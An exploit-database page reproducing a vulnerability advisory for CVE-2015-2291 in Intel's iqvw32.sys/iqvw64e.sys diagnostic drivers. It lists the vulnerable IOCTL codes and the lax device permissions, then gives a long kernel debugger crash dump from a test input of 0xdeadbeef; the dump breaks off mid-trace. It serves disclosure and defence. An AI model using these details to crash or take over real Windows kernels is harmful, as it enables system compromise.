Menu

Search for hundreds of thousands of exploits

"Intel Network Adapter Diagnostic Driver - IOCTL Handling"

Author

Exploit author

"Glafkos Charalambous"

Platform

Exploit platform

windows

Release date

Exploit published date

2015-03-14

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
/*

Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability
Vendor: Intel
Product webpage: http://www.intel.com
Affected product(s):
	Network Adapter Driver for Windows XP
	Network Adapter Driver for Windows 7
	Network Adapter Driver for Windows 8
	Network Adapter Driver for Windows 2008/R2
	Network Adapter Driver for Windows 2012/R2
Affected version(s): 
	Intel(R) iQVW64.SYS v1.03.0.7
	Intel(R) iQVW32.SYS v1.03.0.7
Tested Operating systems:
	Windows XP SP3 (32-bit)
	Windows 7 SP1 (32/64-bit)
Date: 14/03/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-2291

Disclosure Timeline:
10-06-2014: Vendor Notification
21-06-2014: Vendor Response/Feedback
08-08-2014: Vendor Response/Feedback
26-08-2014: Requesting Status/No Vendor Response
30-09-2014: Requesting Status/No Vendor Response
22-10-2014: Requesting Status/No Vendor Response
10-01-2015: Requesting Status/No Vendor Response
15-01-2015: Requesting Status/No Vendor Response
14-03-2015: CVE Requested
14-03-2015: CVE Assigned
14-03-2015: Public Disclosure

Description:
A vulnerability in iqvw32.sys and iqvw64e.sys drivers has been discovered in Intel Network Adapter Driver.

The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes 0x80862013, 
0x8086200B, 0x8086200F, 0x80862007 using METHOD_NEITHER and due to insecure permissions allowing everyone read and write 
access to privileged use only functionality.

Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.


IOCTL 0x80862013
----------------
Microsoft (R) Windows Debugger Version 6.2.9200.20512 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

Opened \\.\pipe\com_2
Waiting to reconnect...
Connected to Windows 7 7601 x64 target at (Thu Feb 26 18:33:59.291 2015 (UTC + 2:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*k:\symbols*http://msdl.microsoft.com/download/symbols;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\google*http://chromium-browser-symsrv.commondatastorage.googleapis.com;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\microsoft*http://msdl.microsoft.com/download/symbols
Executable search path is: 
Windows 7 Kernel Version 7601 MP (1 procs) Free x64
Built by: 7601.18700.amd64fre.win7sp1_gdr.141211-1742
Machine Name:
Kernel base = 0xfffff800`03655000 PsLoadedModuleList = 0xfffff800`03898890
System Uptime: not available
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x0000003b
                       (0x00000000C0000005,0xFFFFF88005A0BFD2,0xFFFFF8800653A9C0,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

Connected to Windows 7 7601 x64 target at (Thu Feb 26 20:29:05.978 2015 (UTC + 2:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
...............................
Loading User Symbols
.....
Loading unloaded module list
....Unable to enumerate user-mode unloaded modules, Win32 error 0n30
Loading Wow64 Symbols
.....
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 3B, {c0000005, fffff88005a0bfd2, fffff8800653a9c0, 0}

*** ERROR: Module load completed but symbols could not be loaded for iqvw64e.sys

Followup: MachineOwner
---------

nt!RtlpBreakWithStatusInstruction:
fffff800`036c3cb0 cc              int     3
3: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff88005a0bfd2, Address of the instruction which caused the bugcheck
Arg3: fffff8800653a9c0, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.

Debugging Details:
------------------

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

FAULTING_IP: 
iqvw64e+3fd2
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx]

CONTEXT:  fffff8800653a9c0 -- (.cxr 0xfffff8800653a9c0)
rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0         nv up ei pl nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx] ds:002b:00000000`deadbeef=????????????????
Resetting default scope

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0x3B

PROCESS_NAME:  ConsoleApplica

CURRENT_IRQL:  2

LAST_CONTROL_TRANSFER:  from fffff88005a091ac to fffff88005a0bfd2

STACK_TEXT:  
fffff880`0653b3a0 fffff880`05a091ac : fffffa80`4aac7b00 00000000`00000001 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x3fd2
fffff880`0653b8a0 fffff800`039e80f7 : 00000000`80862013 fffff880`0653bb60 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x11ac
fffff880`0653b8d0 fffff800`039e8956 : fffff680`003b5ee8 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x607
fffff880`0653ba00 fffff800`036cb113 : 00000000`0021df01 0000007f`ffffffff 00000000`0021df00 00000980`00000000 : nt!NtDeviceIoControlFile+0x56
fffff880`0653ba70 00000000`73b02e09 : 00000000`73b02944 00000000`775a01b4 00000000`73b70023 00000000`00000246 : nt!KiSystemServiceCopyEnd+0x13
00000000`0021e898 00000000`73b02944 : 00000000`775a01b4 00000000`73b70023 00000000`00000246 00000000`001dff7c : wow64cpu!CpupSyscallStub+0x9
00000000`0021e8a0 00000000`73b7d286 : 00000000`00000000 00000000`73b01920 00000000`0021eb30 00000000`773decf1 : wow64cpu!DeviceIoctlFileFault+0x31
00000000`0021e960 00000000`73b7c69e : 00000000`00000000 00000000`00000000 00000000`73b74b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa
00000000`0021e9b0 00000000`773f4966 : 00000000`003331f0 00000000`00000000 00000000`774e2670 00000000`774b5978 : wow64!Wow64LdrpInitialize+0x42a
00000000`0021ef00 00000000`773f1937 : 00000000`00000000 00000000`773f4071 00000000`0021f4b0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3
00000000`0021f3f0 00000000`773dc34e : 00000000`0021f4b0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x28ff0
00000000`0021f460 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe


FOLLOWUP_IP: 
iqvw64e+3fd2
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx]

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  iqvw64e+3fd2

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: iqvw64e

IMAGE_NAME:  iqvw64e.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  5284eac3

STACK_COMMAND:  .cxr 0xfffff8800653a9c0 ; kb

FAILURE_BUCKET_ID:  X64_0x3B_iqvw64e+3fd2

BUCKET_ID:  X64_0x3B_iqvw64e+3fd2

Followup: MachineOwner
---------

3: kd> u fffff880`05a0bfd2
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx]
fffff880`05a0bfd5 488d0d14160000  lea     rcx,[iqvw64e+0x55f0 (fffff880`05a0d5f0)]
fffff880`05a0bfdc e84fdfffff      call    iqvw64e+0x1f30 (fffff880`05a09f30)
fffff880`05a0bfe1 488b17          mov     rdx,qword ptr [rdi]
fffff880`05a0bfe4 488d42ff        lea     rax,[rdx-1]
fffff880`05a0bfe8 4883f807        cmp     rax,7
fffff880`05a0bfec 0f8718020000    ja      iqvw64e+0x420a (fffff880`05a0c20a)
fffff880`05a0bff2 488d0d07c0ffff  lea     rcx,[iqvw64e (fffff880`05a08000)]

3: kd> !for_each_frame .frame /r @$Frame
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800036c3cb0 rsp=fffff88006539988 rbp=0000000000000000
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!RtlpBreakWithStatusInstruction:
fffff800`036c3cb0 cc              int     3
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800037bba62 rsp=fffff88006539990 rbp=0000000000000000
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KiBugCheckDebugBreak+0x12:
fffff800`037bba62 eb75            jmp     nt!KiBugCheckDebugBreak+0x89 (fffff800`037bbad9)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
rax=0000000000000000 rbx=0000000000000065 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800037bc84e rsp=fffff880065399f0 rbp=0000000000000000
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KeBugCheck2+0x71e:
fffff800`037bc84e eb11            jmp     nt!KeBugCheck2+0x731 (fffff800`037bc861)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cbf84 rsp=fffff8800653a0c0 rbp=0000000000000000
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KeBugCheckEx+0x104:
fffff800`036cbf84 90              nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cb429 rsp=fffff8800653a100 rbp=0000000000000000
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KiBugCheckDispatch+0x69:
fffff800`036cb429 90              nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cad7c rsp=fffff8800653a240 rbp=0000000000000000
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KiSystemServiceHandler+0x7c:
fffff800`036cad7c b801000000      mov     eax,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036f6a4d rsp=fffff8800653a280 rbp=0000000000000000
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!RtlpExecuteHandlerForException+0xd:
fffff800`036f6a4d 90              nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036f5825 rsp=fffff8800653a2b0 rbp=0000000000000000
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!RtlDispatchException+0x415:
fffff800`036f5825 0fba257fc51d0017 bt      dword ptr [nt!NtGlobalFlag (fffff800`038d1dac)],17h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
rax=0000000000000000 rbx=fffff8800653b168 rcx=0000000000000003
rdx=000000000000008a rsi=fffff8800653b210 rdi=00000000deadbeef
rip=fffff800037067b1 rsp=fffff8800653a990 rbp=fffff8800653aec0
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff8800653a9c0 r13=000000000010001f
r14=fffff8800653b030 r15=fffffa804aac7b00
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KiDispatchException+0x135:
fffff800`037067b1 84c0            test    al,al
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff800036cb502 rsp=fffff8800653b030 rbp=fffff8800653b290
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KiExceptionDispatch+0xc2:
fffff800`036cb502 488d8c2400010000 lea     rcx,[rsp+100h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a
0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a
rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff800036ca07a rsp=fffff8800653b210 rbp=fffff8800653b290
 r8=0000000000000065  r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KiPageFault+0x23a:
fffff800`036ca07a 440f20c0        mov     rax,cr8
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11          mov     rdx,qword ptr [rcx]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160
rip=fffff88005a091ac rsp=fffff8800653b8a0 rbp=fffff8800653bb60
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
iqvw64e+0x11ac:
fffff880`05a091ac 8bd8            mov     ebx,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160
rip=fffff800039e80f7 rsp=fffff8800653b8d0 rbp=fffff8800653bb60
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!IopXxxControlFile+0x607:
fffff800`039e80f7 448be0          mov     r12d,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88
rip=fffff800039e8956 rsp=fffff8800653ba00 rbp=fffff8800653bb60
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!NtDeviceIoControlFile+0x56:
fffff800`039e8956 4883c468        add     rsp,68h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13
0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13
rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88
rip=fffff800036cb113 rsp=fffff8800653ba70 rbp=fffff8800653bb60
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
nt!KiSystemServiceCopyEnd+0x13:
fffff800`036cb113 65ff042538220000 inc     dword ptr gs:[2238h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034
rip=0000000073b02e09 rsp=000000000021e898 rbp=00000000001dfe68
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
wow64cpu!CpupSyscallStub+0x9:
00000000`73b02e09 c3              ret
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034
rip=0000000073b02944 rsp=000000000021e8a0 rbp=00000000001dfe68
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
wow64cpu!DeviceIoctlFileFault+0x31:
00000000`73b02944 488b4c2420      mov     rcx,qword ptr [rsp+20h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0
rip=0000000073b7d286 rsp=000000000021e960 rbp=000000000021e9d0
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000
r14=0000000000000001 r15=ffffffffffffffff
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
wow64!RunCpuSimulation+0xa:
00000000`73b7d286 eb00            jmp     wow64!RunCpuSimulation+0xc (00000000`73b7d288)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0
rip=0000000073b7c69e rsp=000000000021e9b0 rbp=000000000021e9d0
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000
r14=0000000000000001 r15=ffffffffffffffff
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
wow64!Wow64LdrpInitialize+0x42a:
00000000`73b7c69e cc              int     3
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=00000000774e2670 rdi=00000000774b5978
rip=00000000773f4966 rsp=000000000021ef00 rbp=00000000773b0000
 r8=fffffa804b0f4d70  r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=00000000774e2520 r13=0000000000000000
r14=00000000774e2650 r15=000000007efdf000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
ntdll!LdrpInitializeProcess+0x17e3:
00000000`773f4966 eb00            jmp     ntdll!LdrpInitializeProcess+0x1c12 (00000000`773f4968)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
